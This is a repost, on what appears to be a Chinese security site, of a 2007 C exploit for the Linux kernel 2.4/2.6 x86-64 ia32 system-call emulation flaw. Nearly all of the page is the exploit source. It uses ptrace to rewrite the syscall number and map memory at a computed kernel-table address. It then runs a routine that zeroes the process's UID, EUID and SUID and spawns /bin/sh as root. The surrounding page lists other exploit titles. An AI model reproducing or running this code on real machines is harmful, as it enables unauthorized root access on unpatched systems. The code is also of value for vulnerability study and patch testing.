首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Linux Kernel 2.4/2.6 x86-64 System Call Emulation Exploit 来源：http://www.atm-lab.pl 作者：Robert 发布时间：2007-09-27   /* * exploit for x86_64 linux kernel ia32syscall emulation * bug, discovered by Wojciech Purczynski <cliph_at_isec.pl> * * by * Robert Swiecki <robert_at_swiecki.net> * Przemyslaw Frasunek <venglin_at_freebsd.lublin.pl> * Pawel Pisarczyk <pawel_at_immos.com.pl> * of ATM-Lab http://www.atm-lab.pl */ #include <sys/types.h> #include <sys/wait.h> #include <sys/ptrace.h> #include <inttypes.h> #include <sys/reg.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> uint32_t uid, euid, suid; static void kernelmodecode(void) {         int i;         uint8_t *gs;         uint32_t *ptr;         asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs));         for (i = 200; i < 1000; i+=1) {                 ptr = (uint32_t*) (gs + i);                 if ((ptr[0] == uid) && (ptr[1] == euid)                         && (ptr[2] == suid) && (ptr[3] == uid)) {                         ptr[0] = 0; //UID                         ptr[1] = 0; //EUID                         ptr[2] = 0; //SUID                         break;                 }         } } static void docall(uint64_t *ptr, uint64_t size) {         getresuid(&uid, &euid, &suid);         uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);         if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,                 MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {                 printf("mmap fault\n");                 exit(1);         }         for (; ptr < (tmp + size); ptr++)                 *ptr = (uint64_t)kernelmodecode;         __asm__("\n"         "\tmovq $0x101, %rax\n"         "\tint $0x80\n");         printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());         execl("/bin/sh", "bin/sh", 0);         printf("no /bin/sh ??\n");         exit(0); } int main(int argc, char **argv) {         int pid, status, set = 0;         uint64_t rax;         uint64_t kern_s = 0xffffffff80000000;         uint64_t kern_e = 0xffffffff84000000;         uint64_t off = 0x0000000800000101 * 8;         if (argc == 4) {                 docall((uint64_t*)(kern_s + off), kern_e - kern_s);                 exit(0);         }         if ((pid = fork()) == 0) {                 ptrace(PTRACE_TRACEME, 0, 0, 0);                 execl(argv[0], argv[0], "2", "3", "4", 0);                 perror("exec fault");                 exit(1);         }         if (pid == -1) {                 printf("fork fault\n");                 exit(1);         }         for (;;) {                 if (wait(&status) != pid)                         continue;                 if (WIFEXITED(status)) {                         printf("Process finished\n");                         break;                 }                 if (!WIFSTOPPED(status))                         continue;                 if (WSTOPSIG(status) != SIGTRAP) {                         printf("Process received signal: %d\n", WSTOPSIG(status));                         break;                 }                 rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);                 if (rax == 0x000000000101) {                         if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {                                 printf("PTRACE_POKEUSER fault\n");                                 exit(1);                         }                         set = 1;                 }                 if ((rax == 11) && set) {                         ptrace(PTRACE_DETACH, pid, 0, 0);                         for(;;)                                 sleep(10000);                 }                 if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {                         printf("PTRACE_SYSCALL fault\n");                         exit(1);                 }         }         return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Zomplog <= 3.8.1 upload_files. ·Motorola Timbuktu Pro 8.6.3 Ar ·Tor < 0.1.2.16 ControlPort Rem ·EB Design Pty Ltd (EBCRYPT.DLL ·MDPro 1.0.76 Remote SQL Inject ·AskJeeves Toolbar 4.0.2.53 act ·ELSE IF CMS 0.6 Multiple Remot ·Xitami Web Server 2.5 (If-Modi ·CMS Creamotion (securite.php) ·EasyMail MessagePrinter Object ·wzdftpd <= 0.8.0 (USER) Remote ·Lighttpd <= 1.4.17 FastCGI Hea   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved